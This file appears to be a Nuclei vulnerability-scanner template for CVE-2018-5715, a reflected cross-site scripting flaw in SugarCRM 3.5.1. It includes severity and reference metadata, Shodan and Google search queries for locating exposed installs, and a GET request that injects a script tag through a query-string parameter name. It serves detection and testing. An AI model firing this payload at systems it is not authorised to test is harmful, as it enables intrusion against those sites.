nuclei-templates/http/cves/2018/CVE-2018-5715.yaml

51 lines
1.7 KiB
YAML

id: CVE-2018-5715
info:
name: SugarCRM 3.5.1 - Cross-Site Scripting
author: edoardottt
severity: medium
description: SugarCRM 3.5.1 is vulnerable to cross-site scripting via phprint.php and a parameter name in the query string (aka a $key variable).
remediation: |
Upgrade to a patched version of SugarCRM or apply the necessary security patches provided by the vendor.
reference:
- https://www.exploit-db.com/exploits/43683
- https://m4k4br0.github.io/sugarcrm-xss/
- https://www.exploit-db.com/exploits/43683/
- https://nvd.nist.gov/vuln/detail/CVE-2018-5715
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-5715
cwe-id: CWE-79
epss-score: 0.00129
epss-percentile: 0.47445
cpe: cpe:2.3:a:sugarcrm:sugarcrm:3.5.1:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: sugarcrm
product: sugarcrm
shodan-query: http.html:"SugarCRM Inc. All Rights Reserved"
google-query: intext:"SugarCRM Inc. All Rights Reserved"
tags: sugarcrm,xss,edb,cve,cve2018
http:
- method: GET
path:
- "{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '&"/><script>alert(1)</script>=&"><< Back</a><br><br>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 490a0046304402206d82c0c0d34002c92e4d2e17ebbe4c5bf01d3614170e3f32502e5d6ca89fb4210220655418802aa10f72c3a341dfdb8110e84fedd4bd7366069b4ef1d254ad781ec6:922c64590222798bb761d5b6d8e72950